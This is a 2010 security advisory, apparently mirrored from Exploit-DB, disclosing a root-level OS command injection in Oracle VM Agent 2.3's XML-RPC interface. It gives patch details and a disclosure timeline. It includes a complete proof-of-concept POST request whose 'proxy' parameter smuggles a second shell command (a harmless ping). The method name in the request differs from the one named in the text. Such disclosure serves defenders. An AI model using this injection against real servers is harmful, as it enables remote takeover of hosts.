Oracle Virtual Server Agent – Command Injection

  • 作者: Nahuel Grisolia
    日期: 2010-10-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15244/
  • Oracle Virtual Server Agent Command Injection
    =============================================
    
    1. Advisory Information
    Advisory ID: BONSAI-2010-0109
    Date published: 2010-10-13
    Vendors contacted: Oracle
    Release mode: Coordinated release
    
    2. Vulnerability Information
    Class: Injection
    Remotely Exploitable: Yes
    Locally Exploitable: Yes
    
    3. Software Description
    Oracle VM is server virtualization software which fully supports both
    Oracle and non-Oracle applications. Oracle VM offers scalable, low-cost
    server virtualization that is three times more efficient than existing
    server virtualization products from other vendors. Oracle has also
    announced certification of key Oracle products including Oracle
    Database, Oracle Fusion Middleware, Oracle Applications, and Oracle Real
    Application Clusters with Oracle VM.
    
    Oracle VM Manager communicates with Oracle VM Agent to create and manage
    guests on an Oracle VM Server. Oracle VM Agent is installed and
    configured during the installation of Oracle VM Server.
    
    By default, Oracle VM Agent is executed, with a highly privileged user,
    typically root.
    
    4. Vulnerability Description
    Injection flaws, such as SQL, OS, and LDAP injection, occur when
    untrusted data is sent to an interpreter as part of a command or query.
    The attacker’s hostile data can trick the interpreter into executing
    unintended commands or accessing unauthorized data.
    
    5. Vulnerable packages
    We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle
    VM Agent 2.3.
    
    6. Non-vulnerable packages
    Patch set 2.2.1 and above
    
    7. Credits
    This vulnerability was discovered by Nahuel Grisolia ( nahuel -at-
    bonsai-sec.com ).
    
    8. Technical Description
    8.1. OS Command Injection
    CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
    Oracle VS Agent is prone to a remote command execution vulnerability
    because the software fails to adequately sanitize user-supplied input.
    Oracle VS Agent exposes through XML-RPC several functions. One of these
    functions is validate_master_ip, which receives four parameters. The
    second parameter "proxy", is vulnerable to command injection, because it
    is not properly sanitized and its content is concatenated in an
    operative system command, executed as a highly privileged user
    (typically root).
    The following POST message can be sent to the VM Agent XML-RPC port. By
    doing this, the ping command is executed as follows:
    
    POST /RPC2 HTTP/1.0
    User-Agent: XML-RPC for PHP 3.0.0.beta
    authorization: Basic XXXXXXXXXXXXXXX
    Host: XXX.XXX.XXX.XXX:8899
    Accept-Encoding: gzip, deflate
    Accept-Charset: UTF-8,ISO-8859-1,US-ASCII
    Content-Type: text/xml
    Content-Length: 416
    
    <?xml version="1.0"?>
    <methodCall>
    <methodName>utl_test_url</methodName>
    <params>
    <param>
    <value><string>http://192.168.1.101</string></value>
    </param>
    <param>
    <value><string>192.168.1.103'; ping –c 10 localhost; '</string></value>
    </param>
    <param>
    <value><string>192.168.1.101</string></value>
    </param>
    <param>
    <value><string>192.168.1.101</string></value>
    </param>
    </params>
    </methodCall>
    
    9. Report Timeline
    • 2010-09-24 / Bonsai provides vulnerability information to ORACLE
    • 2010-09-29 / Oracle confirms the vulnerability
    • 2010-10-12 / Oracle published Critical Patch Update Fix
    • 2010-10-13 / Public Disclosure
    
    10. About Bonsai
    Bonsai is a company involved in providing professional computer
    information security services. Currently a sound growth company, since
    its foundation in early 2009 in Buenos Aires, Argentina, we are fully
    committed to quality service, and focused on our customers real needs.
    
    11. Disclaimer
    The contents of this advisory are copyright (c) 2010 Bonsai Information
    Security, and may be distributed freely provided that no fee is charged
    for this distribution and proper credit is given.
    
    12. Research
    http://www.bonsai-sec.com/en/research/vulnerability.php